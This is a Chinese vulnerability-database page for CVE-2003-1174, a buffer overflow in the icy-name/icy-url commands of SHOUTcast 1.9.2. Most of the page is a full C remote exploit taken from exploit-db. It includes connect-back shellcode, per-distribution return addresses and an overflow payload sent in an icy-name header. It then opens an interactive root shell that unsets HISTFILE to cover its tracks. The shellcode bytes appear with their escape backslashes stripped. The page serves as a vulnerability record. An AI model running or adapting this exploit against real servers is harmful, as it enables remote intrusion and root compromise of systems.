Nullsoft SHOUTcast icy-name/icy-url内存破坏漏洞

Nullsoft SHOUTcast icy-name/icy-url内存破坏漏洞

漏洞ID 1107572 漏洞类型 边界条件错误
发布时间 2003-11-03 更新时间 2005-10-20
图片[1]-Nullsoft SHOUTcast icy-name/icy-url内存破坏漏洞-安全小百科CVE编号 CVE-2003-1174
图片[2]-Nullsoft SHOUTcast icy-name/icy-url内存破坏漏洞-安全小百科CNNVD-ID CNNVD-200312-266
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/23329
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-266
|漏洞详情
NullsoftSHOUTcastServer是一款用于广播流声讯系统的服务器程序,可使用在多种Linux和Unix操作系统下,也可以使用在MicrosoftWindows操作系统下。NullsoftSHOUTcastServer对授权用户提供的命令缺少充分检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以服务程序进程权限在系统上执行任意指令。NullsoftSHOUTcast服务程序对icy-name和icy-url命令缺少充分缓冲区边界检查,发送超长数据可导致程序崩溃,精心构建提交数据可能以服务程序进程权限在系统上执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/8954/info
 
Nullsoft SHOUTcast Server is prone to a memory corruption vulnerability that may lead to denial of service attacks or code execution. This is due to insufficient bounds checking of server commands supplied by authenticated users, specifically icy-name and icy-url.
 
This issue was reported in SHOUTcast 1.9.2 on Windows platforms. Other versions and platforms may also be affected.

/*           _ ________            _____                        ______
 *
 * oseen_shoucast.c( public version) - SHOUTcast v1.9.2 remote exploit   /   / "fuck mm"
 * by exworm of oseen (www.oseen.org)             /
 *                                         con back exploit
 * bash-2.05b# ./oseen_shoutcast -t 2 -h XXX.XXX.XXX.XXX
 * SHOUTcast v1.9.2 remote exploit by exworm of 0seen
 * --------------------------------------------------(www.oseen.org)
 * [+] lisntener...
 * [+] Connected, sending code...
 * [+] Ret: 0x0806d06b
 * [+] Eax: 0x0806d0e3
 * [+] ownedbyOseen!
 * -----------------------------------------------------------
 * Linux darkstar 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
 *(wheel),11(floppy)
 *
 *
 */

#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <getopt.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <errno.h>
#include <linux/sockios.h>

#define BUF 1024


struct {
        char *distro;
        char *type;
        unsigned long ret;
        unsigned long eax;

} targets[] = { /* Thanks all #oseen ;) */
        { "Slackware 8.1  ", "Shoutcast 1.9.2  ", 0x8091b28, 0x0806d0e3 },
        { "Slackware 9.0  ", "Shoutcast 1.9.2", 0x806d06b, 0x0806d0e3 },
        { "Slackware 9.1  ", "Shoutcast 1.9.2  ", 0x080d1c78, 0x0806d0e3 },
        { "Redhat 7.2     ", "Shoutcast 1.9.2", 0x080d11e0, 0xbffff344 },
        { "Crash          ", "(All platforms)  ", 0xBADe5Dee, 0x0806d0e3 },
};
char linux_connect_back[] =  /* connect back 45295 */
        "x31xc0x31xdbx31xc9x51xb1"
        "x06x51xb1x01x51xb1x02x51"
        "x89xe1xb3x01xb0x66xcdx80"
        "x89xc2x31xc0x31xc9x51x51"
        "x68x41x42x43x44x66x68xb0"
        "xefxb1x02x66x51x89xe7xb3"
        "x10x53x57x52x89xe1xb3x03"
        "xb0x66xcdx80x31xc9x39xc1"
        "x74x06x31xc0xb0x01xcdx80"
        "x31xc0xb0x3fx89xd3xcdx80"
        "x31xc0xb0x3fx89xd3xb1x01"
        "xcdx80x31xc0xb0x3fx89xd3"
        "xb1x02xcdx80x31xc0x31xd2"
        "x50x68x6ex2fx73x68x68x2f"
        "x2fx62x69x89xe3x50x53x89"
        "xe1xb0x0bxcdx80x31xc0xb0"
        "x01xcdx80";
int sock;
void usage();
void shell();

void
usage(char *prog)
{

         fprintf(stderr,"Usage: %s -t [-pah]n",prog);
        fprintf(stderr,"-t version       Linux version.n");
        fprintf(stderr,"-h target       The host to attack.n");
         fprintf(stderr,"-a password     Default password is "changeme".n");
        fprintf(stderr,"-p port         Default port is 8001.nn");
}

int
openhost(char *host,int port)
{
        struct sockaddr_in addr;
        struct hostent *he;

        he=gethostbyname(host);

        if (he==NULL) return -1;
        sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
        if (sock==-1) return -1;

        memcpy(&addr.sin_addr, he->h_addr, he->h_length);

        addr.sin_family=AF_INET;
        addr.sin_port=htons(port);

        if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
        sock=-1;
        return sock;
}


void
shell(int sock)
{
        fd_set  fd_read;
        char buff[1024], *cmd="unset HISTFILE; /bin/uname -a;/usr/bin/id; echo '*** oseen are chinese...'n";
        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {
                FD_SET(sock, &fd_read);
                FD_SET(0,    &fd_read);

                if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break;

                if (FD_ISSET(sock, &fd_read)) {
                        if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                                fprintf(stderr, "[+] EOFn");
                                exit(2);
                        }

                        if (write(1, buff, n) <0) break;
                }

                if (FD_ISSET(0, &fd_read)) {
                        if ((n = read(0, buff, sizeof(buff))) < 0){
                                fprintf(stderr,"[+] EOFn");
                                exit(2);
                        }

                        if (send(sock, buff, n, 0) < 0) break;
                }
        }

        fprintf(stderr,"[+] Connection lost.nn");
        exit(0);
}

unsigned char
*get_my_ip_addr(int sockfd, struct ifreq *ifr)
{
        struct sockaddr_in sin;
        char *b = (char *) malloc(4);

        if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) {
                fprintf(stderr, "Unable to get the local IP Address, use -d.n");
                exit(1);
        }

        memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in));
        memcpy(b, (char *) &sin.sin_addr.s_addr, 4);
        return b;
}


int
main (int argc,char *argv[])
{
        char buf1[512];
        char buf2[512];
        char host[256];
        char pass[256]="changeme";
        char data;



        int  type= 0;
        int c=0;
        int port=8001;
        char device[256] = "ppp0";
        unsigned char *ptr;

        struct hostent *hp;
        struct sockaddr_in sin_listener;
        struct ifreq ifr;
        struct timeval timeout;

        fd_set fdread;

        int delay       = 12;
        int i           = 0;
        int mode        = 0;
        int local_port  = 0;
        int opt         = 0;
        int ret         = 0;
        int sin_len     = sizeof (struct sockaddr_in);
        int sock        = 0;
        int sock2       = 0;
        int sockd       = 0;
        int listener    = 0;
        int time_out    = 4;
        int tmp         = 0;

        srand(getpid());

        fprintf(stdout,"SHOUTcast v1.9.2 remote exploit by exworm of 0seenn");
        fprintf(stdout,"--------------------------------------------------(www.oseen.org)n");

        while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF)
        {
                switch(c)
                {
                        case 'p':
                                port=atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr,"Invalid port.nn");
                                        exit(1);
                                }
                                break;
                        case 'a':
                                memset(pass,0x0,sizeof(pass));
                                strncpy(pass,optarg,sizeof(pass) - 1);
                                break;
                        case 't':
                                type = atoi(optarg);
                                if (type == 0 || type > sizeof(targets) / 28) {
                                        for(i = 0; i < sizeof(targets) / 28; i++)
                                        fprintf(stderr, "%02d. %s - %s      [0x%08x - 0x%08x]n",
                                                i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].eax);
                                        return -1;
                                }
                                break;
                        case 'h':
                                memset(host,0x0,sizeof(host));
                                strncpy(host,optarg,sizeof(host) - 1);
                                break;

                        default:
                                usage(argv[0]);
                                exit(1);
                                break;
                }
        }

        timeout.tv_sec = time_out;
        timeout.tv_usec = 0;

        if (strlen(host) == 0) {
                usage(argv[0]);
                exit(1);
        }
        sock=openhost(host, 8001);

        if (sock==-1) {
                fprintf(stderr,"- Unable to connect.nn");
                exit(1);
        }

        strncpy(ifr.ifr_name, device, 15);

        if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {
                fprintf(stderr, "socket() error.n");
                return -1;
        }

        if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
                fprintf(stderr, "socket() error.n");
                return -1;
        }

        ptr = get_my_ip_addr(sockd, &ifr);
       memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);

        sin_listener.sin_family = AF_INET;
        memset(&sin_listener.sin_zero, 0x00, 8);

        while(1) {
                local_port = local_port = 45295;
                sin_listener.sin_port = htons(local_port);
                if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break;
        }



        listen(listener, 1);
        fprintf(stdout, "[+] lisntener...n");

        linux_connect_back[33] = (unsigned int) *(ptr + 0);
        linux_connect_back[34] = (unsigned int) *(ptr + 1);
        linux_connect_back[35] = (unsigned int) *(ptr + 2);
        linux_connect_back[36] = (unsigned int) *(ptr + 3);


        write(sock, pass, strlen(pass));
        write(sock, "n", 1);

        memset(buf2,  0x0, sizeof(buf2));
        memset(buf1, 0x90, sizeof(buf1));

        for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] = linux_connect_back[i];

        buf1[191] = (targets[type - 1].ret & 0x000000ff);
        buf1[192] = (targets[type - 1].ret & 0x0000ff00) >> 8;
        buf1[193] = (targets[type - 1].ret & 0x00ff0000) >> 16;
        buf1[194] = (targets[type - 1].ret & 0xff000000) >> 24;

        buf1[199] = (targets[type - 1].eax & 0x000000ff);
        buf1[200] = (targets[type - 1].eax & 0x0000ff00) >> 8;
        buf1[201] = (targets[type - 1].eax & 0x00ff0000) >> 16;
        buf1[202] = (targets[type - 1].eax & 0xff000000) >> 24;

        buf1[308] = (targets[type - 1].eax & 0x000000ff);
        buf1[309] = (targets[type - 1].eax & 0x0000ff00) >> 8;
        buf1[310] = (targets[type - 1].eax & 0x00ff0000) >> 16;
        buf1[311] = (targets[type - 1].eax & 0xff000000) >> 24;

        sprintf(buf2,   "icy-name:%srn", buf1);

        fprintf(stdout, "Connected, sending code...n");
        fprintf(stdout, "[+] Ret: 0x%08xn", targets[type - 1].ret);
        fprintf(stdout, "[+] Eax: 0x%08xn", targets[type - 1].eax);
        while(1) {
                write(sock, buf2, strlen(buf2));
                sleep(2);
                FD_ZERO(&fdread);
                FD_SET(listener, &fdread);

                timeout.tv_sec = time_out;
                timeout.tv_usec = 0;

                while(1) {

                        ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);

                        if (ret < 0) {
                                close(sock);
                                close(listener);
                                fprintf(stderr, "select() error.n");
                                return -1;
                        }

                        if (ret == 0) {
                                fprintf(stderr, "[+] Failed, waiting %d seconds.n"
                                                "[+] Use ctrl-c to abort.n", delay);
                                sleep(delay);
                                break;
                        }

                        if(FD_ISSET(listener, &fdread)) {
                                sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len);
                                close(sock);
                                close(listener);

                                fprintf(stderr, "[+] ownedbyOseen!n"
                                                "-----------------------------------------------------------n");
                                shell(sock2);
                                close(sock2);
                                return 0;
                        }
                }

        }

        fprintf(stderr, "[+] Exploit failed.n");
        close(listener);
        close(sock);
        return 0;

}
|参考资料

来源:XF
名称:shoutcast-long-icy-dos(13586)
链接:http://xforce.iss.net/xforce/xfdb/13586
来源:BID
名称:8954
链接:http://www.securityfocus.com/bid/8954
来源:BUGTRAQ
名称:20031102ShoutCastserver1.9.2/win32
链接:http://www.securityfocus.com/archive/1/343177
来源:OSVDB
名称:2776
链接:http://www.osvdb.org/2776
来源:SECTRACK
名称:1008080
链接:http://securitytracker.com/id?1008080
来源:SECUNIA
名称:10146
链接:http://secunia.com/advisories/10146
来源:NSFOCUS
名称:5704
链接:http://www.nsfocus.net/vulndb/5704

相关推荐: EarlyImpact ProductCart Multiple Vulnerabilities

EarlyImpact ProductCart Multiple Vulnerabilities 漏洞ID 1098923 漏洞类型 Unknown 发布时间 2004-02-16 更新时间 2004-02-16 CVE编号 N/A CNNVD-ID N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享